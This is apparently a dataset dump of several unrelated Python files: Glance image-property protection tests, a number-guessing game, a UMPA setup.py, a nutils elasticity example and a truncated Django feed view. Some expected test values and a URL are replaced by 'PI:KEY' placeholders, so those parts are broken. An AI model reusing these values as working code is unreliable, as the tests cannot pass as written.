path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""x_owner_foo"", output.body)\n\n def test_prop_protection_update_without_read(self):\n """"""\n Test protected property cannot be updated without read permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_only_prop\': \'foo\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_update_only_prop\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""spl_update_only_prop"", output.body)\n\n def test_prop_protection_update_noop(self):\n """"""\n Test protected property update is allowed as long as the user has read\n access and the value is unchanged\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_read_prop\': \'foo\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_prop\': \'foo\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'spl_read_prop\'], \'foo\')\n self.assertEquals(output.status_int, 200)\n\n def test_prop_protection_with_delete_and_permitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n permitted role \'member\' can can delete that protected property\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'], {})\n\n def test_prop_protection_with_delete_and_unpermitted_read(self):\n """"""\n Test protected property cannot be deleted without read permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, 200)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:admin\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertEqual(output.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_delete_and_unpermitted_delete(self):\n """"""\n Test protected property cannot be deleted without delete permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_prop\': \'foo\'})\n\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, 403)\n self.assertIn(""Property \'%s\' is protected"" %\n ""spl_update_prop"", output.body)\n\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:admin\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertEqual(\n output.headers[\'x-image-meta-property-spl_update_prop\'], \'foo\')\n\n def test_read_protected_props_leak_with_update(self):\n """"""\n Verify when updating props that ones we don\'t have read permission for\n are not disclosed\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_prop\': \'0\',\n \'x-image-meta-property-foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_update_prop\': \'1\',\n \'X-Glance-Registry-Purge-Props\': \'False\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'spl_update_prop\'], \'1\')\n self.assertNotIn(\'foo\', res_body[\'properties\'])\n\n def test_update_protected_props_mix_no_read(self):\n """"""\n Create an image with two props - one only readable by admin, and one\n readable/updatable by member. Verify member can sucessfully update\n their property while the admin owned one is ignored transparently\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-admin_foo\': \'bar\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'baz\')\n self.assertNotIn(\'admin_foo\', res_body[\'properties\'])\n\n def test_update_protected_props_mix_read(self):\n """"""\n Create an image with two props - one readable/updatable by admin, but\n also readable by spl_role. The other is readable/updatable by\n spl_role. Verify spl_role can successfully update their property but\n not the admin owned one\n """"""\n custom_props = {\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_update_prop\': \'2\'\n }\n image_id = self._create_admin_image(custom_props)\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n\n # verify spl_role can update it\'s prop\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_update_prop\': \'1\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(output.status_int, 200)\n self.assertEqual(res_body[\'properties\'][\'spl_read_only_prop\'], \'1\')\n self.assertEqual(res_body[\'properties\'][\'spl_update_prop\'], \'1\')\n\n # verify spl_role can not update admin controlled prop\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_only_prop\': \'2\',\n \'x-image-meta-property-spl_update_prop\': \'1\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 403)\n\n def test_delete_protected_props_mix_no_read(self):\n """"""\n Create an image with two props - one only readable by admin, and one\n readable/deletable by member. Verify member can sucessfully delete\n their property while the admin owned one is ignored transparently\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-admin_foo\': \'bar\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertNotIn(\'x_owner_foo\', res_body[\'properties\'])\n self.assertNotIn(\'admin_foo\', res_body[\'properties\'])\n\n def test_delete_protected_props_mix_read(self):\n """"""\n Create an image with two props - one readable/deletable by admin, but\n also readable by spl_role. The other is readable/deletable by\n spl_role. Verify spl_role is forbidden to purge_props in this scenario\n without retaining the readable prop.\n """"""\n custom_props = {\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_delete_prop\': \'2\'\n }\n image_id = self._create_admin_image(custom_props)\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 403)\n', '#!/usr/bin/python\n# version 4\n# april 2012 \n# this was written by saikia81 and is copyrighted under the GNU general public license 3\n# it was written in notepad++, a program I recommend!\n# whitespace ftw!\n\n\n#import random, system and operating system possibilities.\nimport os, sys\nimport random, time #time moduele\n#pickling for data2file\nimport cPickle as pickle\n\n\n#introducing the player\ndef instructions():\n print \'welcome to the guess my number game V4\'\n print ""I\'ll think of a number and you have to guess it\\n""\n\n#making a list of all possible numbers for every dificulty\ndef list_numbers():\n list_easy = []\n list_medium = []\n list_hard = []\n for n in range(1,101):\n list_easy.append(n)\n list_medium.append(n)\n list_hard.append(n)\n for n in range(101,201):\n list_medium.append(n)\n list_hard.append(n)\n for n in range(-201,0):\n n += 1\n list_hard.append(n)\n return list_easy, list_medium, list_hard\n\n\n#does the player want to change the dificulty\ndef change_dificulty(dificulty):\n if dificulty == None:\n dificulty = choose_dificulty()\n return dificulty\n if raw_input(""do you want to change dificulty? yes/no: "") == \'yes\':\n dificulty = choose_dificulty()\n return dificulty\n else:\n return dificulty\n \n\n#the dificulty the player wants to choose\ndef choose_dificulty():\n print \'\\nwhat dificulty do you want to play in?\'\n dificulty = raw_input(\'choose between ""easy"", ""medium"" or ""hard"":\\n\') \n dificulties = \'easy\', \'medium\', \'hard\'\n #if anybody tries to be smart: help them get it right\n wrong = -1\n if dificulty in dificulties: wrong = 0\n elif dificulty not in dificulties:\n wrong += 1 \n for n in (1,2,3):\n if n == 3:\n print ""\\nseems like you can\'t handle choosing a dificulty...""\n dificulty = ""easy""\n time.sleep(2)\n print """"\n elif (dificulty not in dificulties):\n print \'something went wrong!!! please try again\\n\'\n dificulty = raw_input(\'choose between ""easy"", ""medium"" or ""hard"":\\n\')\n wrong += 1\n elif dificulty in dificulties:\n print ""\\nalright so let\'s get started :D\\n""\n break\n else:\n print ""you\'re doing something wrong! I\'ll chooce a dificulty for you\\a\\a\\a\\a\\n""\n dificulty = \'easy\'\n print ""ERROR: 008""\n time.sleep(2)\n else:\n print \'\\a\\a\\asomething went wrong the program will shutdown.\'\n print ""ERROR: 009""\n time.sleep(2.5)\n sys.exit()\n return dificulty\n\n#so here a random number will be choosen depending of the dificulty\ndef random_number(dificulty, list_easy, list_medium, list_hard):\n if dificulty == \'easy\':\n NUMBER = random.randrange(100) + 1\n print ""you have choosen the dificulty easy.""\n number_range = \'1 and 100: \'\n numbers = list_easy\n elif dificulty == \'medium\':\n NUMBER = random.randrange(200) + 1\n print ""you have choosen the dificulty medium.""\n number_range = \'1 and 200: \'\n numbers = list_medium\n elif dificulty ==\'hard\':\n NUMBER = random.randrange(-200,201)\n print ""you have choosen the dificulty hard.""\n number_range = \'-200 and 200: \'\n numbers = list_hard\n else:\n print ""dificulty malfunction""\n print ""ERROR: 003""\n time.sleep(2.5)\n exit()\n return NUMBER, number_range, numbers\n\n# if the guess != ""the (predefined) number"": loop.\ndef game(dificulty, NUMBER, number_range, numbers):\n time.sleep(2.5)\n os.system(\'cls\')\n guesses=0\n guess=\'nothing\'\n while guess != NUMBER:\n if guess == \'nothing\':\n print \'guess a number between\', number_range\n try:\n guess = input()\n except:\n print ""\\nsomething went wrong\\nyou\'re getting another try\\n\\n""\n continue\n guesses += 1\n elif guess == \'cheater\':\n guess = NUMBER\n elif guess not in numbers:\n print ""\\nthe guess you made isn\'t in the range of valid numbers.\\nAre you sure you want to make this guess?""\n answ = raw_input(""\'yes\'/\'no\' \\n"")\n if answ == \'yes\':\n print ""it\'s your funeral""\n print \'\\nnguess a number between\', number_range\n guesses += 1\n elif answ == \'no\':\n print ""good choice""\n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\nyou\'re getting another try\\n""\n continue\n else:\n print ""that isn\'t a valid option""\n print ""let\'s continue\\n""\n #if the number is higher than the guess\n elif guess < NUMBER:\n print \'higher...\'\n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\nyou\'re getting another try\\n""\n continue\n guesses += 1\n continue\n #if the number is \'lower...\'\n elif guess > NUMBER:\n print \'lower...\' \n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\n you\'ll get another try""\n continue\n guesses -= 1\n guesses += 1\n #this is actually an error that will never occur... but better safe than sorry.\n else:\n print \'\\a\\a\\asorry, something went wrong. The game will now end itself.\'\n sys.exit()\n print\n print \'you did it the NUMBER was: \', NUMBER,\n print \'it cost you \', guesses, \'guesses to get it right\', \'on dificulty\', dificulty\n print\n return guesses\n\n##Here I will use the \'os\' module to keep a highscore system\n#in the default appdata of the users profile.\n#everything here is to see if everything is alright in it\'s place.\ndef highscore(dificulty,guesses):\n FOLDER_LOCALAPPDATA = os.environ[\'LOCALAPPDATA\']\n FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + \'\\\\Number_game\'\n #deciding if a new highscore file and/or dir is needed\n if os.access(FOLDER_NUMBER_GAME, 0) == False: #dir\n try:\n os.mkdir(FOLDER_NUMBER_GAME)\n except:\n os.system(\'cls\')\n print \'creating folder: ERROR\\nError code: 002\'\n os.system(\'pause\')\n sys.exit()\n try:\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""w+"")\n easy_highscores={}\n medium_highscores={}\n hard_highscores={}\n all_highscores = [easy_highscores,medium_highscores,hard_highscores]\n pickle.dump(all_highscores,HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r+"")\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n \n except:\n os.system(\'cls\')\n print \'loading file: ERROR\\nError code: 001\'\n os.system(\'pause\')\n sys.exit()\n else:\n HIGHSCORES_DAT.close()\n \n \n #done with file and folder creation\n #\n #showing highscores\n \n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r"") \n try:\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n except:\n print ""couldn\'t locate or unpickle file""\n print ""ERROR: 005""\n print ""\\n if this was your first run of the game: this is common""\n print ""if not, please send a message at dummy@email.com, thank you""\n time.sleep(1)\n print ""everything went worse then expected. shutting down""\n time.sleep(2.5)\n sys.exit()\n \n else:\n HIGHSCORES_DAT.close()\n\n if dificulty == ""easy"": l=0\n if dificulty == ""medium"": l=1\n if dificulty == ""hard"": l=2\n highscores = unpickled_file[l]\n \n #creating your highscore...\n your_name = raw_input(\'what is your name?: \')\n try:\n if highscores[your_name]>guesses:\n os.system(\'cls\')\n print ""congratulations, new highscore!!""\n if raw_input(\'do you want to replace your score yes/no: \') ==""yes"": highscores[your_name]=guesses\n except:\n print ""new user""\n highscores[your_name]=guesses\n \n list_keys= highscores.keys()\n list_values= highscores.values()\n\n list_values.sort()\n \n time.sleep(4)\n os.system(\'cls\') \n #deeply annoying part\n #highscore display\n print"" ---HIGHSCORE---""\n print ""highscores in"", dificulty,""dificulty""\n print""\\nname attempts""\n print""----------------------------------------""\n i=0\n #for values in sorted values list\n for n in list_values:\n #reset found to find next highscore\n found = False\n #set p to 0: to try different keys\n p=0\n #while the matching key and value not found keep looking\n while found != True:\n #m = the next key in list\n m=list_keys[p]\n if highscores[m] == n: found=True\n p+=1\n b=len(m)\n b=21-b\n print m,\' \'*b,highscores[m]\n \n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r"")\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n if l==0: unpickled_file[0]=highscores\n if l==1: unpickled_file[1]=highscores\n if l==2: unpickled_file[2]=highscores\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""w"")\n pickle.dump(unpickled_file,HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n\ndef end():\n time.sleep(1)\n print(\'\'\'\n The number Game V4\n Copyright (C) 2012 Saikia81\n \'\'\')\n time.sleep(5)\n os.system(\'cls\')\n print(""""""\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n """""")\n time.sleep(7)\n try:\n if pygame.mixer.get_busy()>0:\n try:\n pygame.mixer.music.fadeout(3000)\n except:\n print ""ERROR: 012""\n except:\n pass\n time.sleep(3)\n os.system(\'pause\')\n sys.exit()\n\ndef main():\n #initializing\n ask_music = raw_input(\'music ""on""?: \')\n if (ask_music == \'on\') or (ask_music == \'yes\'):\n try:\n import pygame.mixer\n pygame.mixer.init()\n pygame.mixer.music.load(""song.mp3"")\n pygame.mixer.music.play(-1)\n except:\n print ""pygame not working!\\nError: 013""\n os.system(\'cls\')\n list_easy, list_medium, list_hard = list_numbers()\n dificulty = None\n instructions()\n while 1:\n dificulty=change_dificulty(dificulty)\n NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard)\n guesses = game(dificulty, NUMBER, number_range, numbers)\n highscore(dificulty,guesses)\n\n ask_again = raw_input(\'\\ndo you want to play again? yes/no: \')\n os.system(\'cls\')\n if ask_again == \'no\': end()\n\n#start\nmain()\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2008-2009 Adriano Monteiro Marques.\n#\n# Author: Bartosz SKOWRON \n#\n# This library is free software; you can redistribute it and/or modify \n# it under the terms of the GNU Lesser General Public License as published \n# by the Free Software Foundation; either version 2.1 of the License, or \n# (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful, but \n# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public \n# License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License \n# along with this library; if not, write to the Free Software Foundation, \n# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA \n\nimport glob\nimport os\nimport os.path\nfrom stat import ST_MODE\nfrom distutils.core import setup\nfrom distutils.command.install import install\n\nUMPA_VERSION = \'0.2\'\nSHARE_DIR = os.path.join(\'share\', \'umpa\')\nDOCS_DIR = os.path.join(\'share\', \'doc\', \'umpa\')\n\nTESTS_DIR = [\n os.path.join(\'tests\'),\n os.path.join(\'tests\', \'system\'),\n os.path.join(\'tests\', \'system\', \'test_snd\'),\n os.path.join(\'tests\', \'system\', \'test_sndrcv\'),\n os.path.join(\'tests\', \'a_unit\'),\n os.path.join(\'tests\', \'a_unit\', \'test_extensions\'),\n os.path.join(\'tests\', \'a_unit\', \'test_protocols\'),\n os.path.join(\'tests\', \'a_unit\', \'test_utils\'),\n os.path.join(\'tests\', \'a_unit\', \'test_sniffing\'),\n os.path.join(\'tests\', \'a_unit\', \'test_sniffing\', \'test_libpcap\'),\n]\n\nclass umpa_install(install):\n def run(self):\n install.run(self)\n self.create_uninstaller()\n\n def create_uninstaller(self):\n uninstaller_filename = os.path.join(\n self.install_data, SHARE_DIR, \'uninstall_umpa\')\n uninstaller = []\n uninstaller.append(\n ""#!/usr/bin/env python\\n""\n ""import os, sys, shutil\\n""\n ""\\n""\n ""print\\n""\n ""print \'%(line)s Uninstall UMPA %(version)s %(line)s\'\\n""\n ""print\\n""\n ""\\n""\n ""answer = raw_input(\'Are you sure that you want to \'\\n""\n "" \'completly uninstall UMPA %(version)s? (yes/no) \')\\n""\n ""\\n""\n ""if answer.lower() not in [\'yes\', \'y\']:\\n""\n "" sys.exit(0)\\n""\n ""\\n""\n ""print\\n""\n ""print \'%(line)s Uninstalling UMPA %(version)s... %(line)s\'\\n""\n ""print\\n"" % {\'version\': UMPA_VERSION, \'line\': \'-\' * 10})\n\n for output in self.get_outputs():\n uninstaller.append(\n \'print ""Removing %(output)s...""\\n\'\n \'if os.path.exists(""%(output)s""):\\n\'\n \' os.remove(""%(output)s"")\\n\' % {\'output\': output})\n\n uninstaller.append(\n ""print \'Removing uninstaller itself...\'\\n""\n ""os.remove(\'%s\')\\n"" % uninstaller_filename)\n\n uninstaller.append(\'print ""Removing empty directories...""\\n\')\n for dir in (\n os.path.join(self.install_data, SHARE_DIR),\n os.path.join(self.install_data, DOCS_DIR),\n os.path.join(self.install_lib, \'umpa\'),\n ):\n uninstaller.append(\n \'if os.path.exists(""%(dir)s""):\\n\'\n \' shutil.rmtree(""%(dir)s"")\\n\' % {\'dir\' : dir})\n\n uninstaller_file = open(uninstaller_filename, \'w\')\n uninstaller_file.writelines(uninstaller)\n uninstaller_file.close()\n\n # Set exec bit for uninstaller\n mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777\n os.chmod(uninstaller_filename, mode)\n\ncmdclasses = {\n \'install\' : umpa_install,\n }\n\ntest_files = []\nfor dir in TESTS_DIR:\n test_files = test_files + [ (os.path.join(SHARE_DIR, dir),\n glob.glob(os.path.join(dir,\'*.py\')))]\n\ndata_files = [ (os.path.join(SHARE_DIR,\'examples\'),\n glob.glob(os.path.join(\'examples\',\'*\'))),\n (os.path.join(DOCS_DIR,\'API\'),\n glob.glob(os.path.join(\'docs\',\'API\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\',\'_sources\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'_sources\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\',\'_static\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'_static\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'*.*\'))),\n (SHARE_DIR, (\'run_tests.sh\', \'run_tests.bat\')),\n (DOCS_DIR,\n (\'README\', \'COPYING\', \'AUTHORS\', \'TODO\', \'CHANGES\',\n \'INSTALL\')),\n (os.path.join(SHARE_DIR, \'tests\'),\n (os.path.join(\'tests\',\'README\'),\n os.path.join(\'tests\',\'IMPORTANT\'))),\n ] + test_files\n\nsetup( name = ""UMPA"",\n version = UMPA_VERSION,\n description = ""Umit\'s Manipulations of Packets Art"",\n author = ""Bartosz SKOWRON"",\n author_email = dummy@email.com"",\n url = ""http://www.umpa.umitproject.org"",\n license = ""GNU LGPLv2"",\n platforms = [""Platform Independent""],\n packages = [ ""umit"",\n ""umit.umpa"",\n ""umit.umpa.protocols"",\n ""umit.umpa.sniffing"",\n ""umit.umpa.sniffing.libpcap"",\n ""umit.umpa.extensions"",\n ""umit.umpa.utils"",\n ],\n data_files = data_files,\n cmdclass = cmdclasses,\n)\n', ""#! /usr/bin/env python3\n#\n# In this script we solve the linear elasticity problem on a unit square\n# domain, clamped at the left boundary, and stretched at the right boundary\n# while keeping vertical displacements free.\n\nfrom nutils import mesh, function, solver, export, cli, testing\n\ndef main(nelems:int, etype:str, btype:str, degree:int, poisson:float):\n '''\n Horizontally loaded linear elastic plate.\n\n .. arguments::\n\n nelems [10]\n Number of elements along edge.\n etype [square]\n Type of elements (square/triangle/mixed).\n btype [std]\n Type of basis function (std/spline), with availability depending on the\n configured element type.\n degree [1]\n Polynomial degree.\n poisson [.25]\n Poisson's ratio, nonnegative and strictly smaller than 1/2.\n '''\n\n domain, geom = mesh.unitsquare(nelems, etype)\n\n ns = function.Namespace()\n ns.x = geom\n ns.basis = domain.basis(btype, degree=degree).vector(2)\n ns.u_i = 'basis_ni ?lhs_n'\n ns.X_i = 'x_i + u_i'\n ns.lmbda = 2 * poisson\n ns.mu = 1 - 2 * poisson\n ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2'\n ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'\n\n sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2)\n sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2)\n cons = solver.optimize('lhs', sqr, droptol=1e-15)\n\n res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2)\n lhs = solver.solve_linear('lhs', res, constrain=cons)\n\n bezier = domain.sample('bezier', 5)\n X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs)\n export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull)\n\n return cons, lhs\n\n# If the script is executed (as opposed to imported), :func:`nutils.cli.run`\n# calls the main function with arguments provided from the command line. For\n# example, to keep with the default arguments simply run :sh:`python3\n# elasticity.py`. To select mixed elements and quadratic basis functions add\n# :sh:`python3 elasticity.py etype=mixed degree=2`.\n\nif __name__ == '__main__':\n cli.run(main)\n\n# Once a simulation is developed and tested, it is good practice to save a few\n# strategic return values for regression testing. The :mod:`nutils.testing`\n# module, which builds on the standard :mod:`unittest` framework, facilitates\n# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the\n# embedding of desired results as compressed base64 data.\n\nclass test(testing.TestCase):\n\n @testing.requires('matplotlib')\n def test_default(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYMACGsiHP0wxMQBKlBdi''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox\n PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''')\n\n @testing.requires('matplotlib')\n def test_mixed(self):\n cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n PI:KEY\n PI:KEY''')\n\n @testing.requires('matplotlib')\n def test_quadratic(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYCACNIxc+MOUMAYA/+NOFg==''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNqFzLPI:KEY\n PI:KEY\n PI:KEY\n PI:KEY\n PI:KEY''')\n\n @testing.requires('matplotlib')\n def test_poisson(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYMACGsiHP0wxMQBKlBdi''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND\n uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''')\n"", 'import json\nimport random\nimport datetime\n\nfrom codalib import APP_AUTHOR\nfrom codalib.bagatom import wrapAtom, makeObjectFeed\nfrom dateutil import parser\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import get_object_or_404, render\nfrom django.utils.feedgenerator import Atom1Feed\nfrom lxml import etree\n\nfrom django.views.generic import ListView\n\nfrom .models import Validate\n\n\nXML_HEADER = b""\\n%s""\n\n\nclass CorrectMimeTypeFeed(Atom1Feed):\n mime_type = \'application/xml\'\n\n\nclass AtomNextNewsFeed(Feed):\n """"""\n next view.\n an atom pub representation of the next validation to occur.\n should be a single item.\n """"""\n\n feed_type = Atom1Feed\n link = ""/validate/next/""\n title = ""UNT Coda Validate App""\n subtitle = ""The highest priority validation item""\n reason = \'None\'\n author_name = APP_AUTHOR.get(\'name\', None)\n author_link = APP_AUTHOR.get(\'uri\', None)\n feed_type = CorrectMimeTypeFeed\n\n def get_object(self, request, server):\n if server:\n return server\n else:\n return None\n\n def items(self, obj):\n # need to filter by server first, if provided\n reason = \'\'\n if obj:\n validations = Validate.objects.all().filter(server=obj)\n reason = \'This selection was filtered to only consider \\\n server %s. \' % obj\n else:\n validations = Validate.objects.all()\n # next check if we have any with a priority above 0\n v = validations.filter(\n priority__gt=0).order_by(\'priority_change_date\')\n if v.exists():\n reason += \'Item was chosen because it is the \\\noldest prioritized.\'\n # if set is empty, go with any priority with last_verified older than\n # settings.VALIDATION_PERIOD\n else:\n # It might seem natural to use django\'s built-in random ordering,\n # but that technique becomes slow when using large sets\n # because \'order by ?\' is very expensive against MySQL dbs.\n # v = Validate.objects.all().filter(\n # last_verified__gte=datetime.datetime.now() -\n # settings.VALIDATION_PERIOD\n # ).order_by(\'?\')\n # instead, let\'s do this:\n # http://elpenia.wordpress.PI:KEY\n now = datetime.datetime.now()\n v 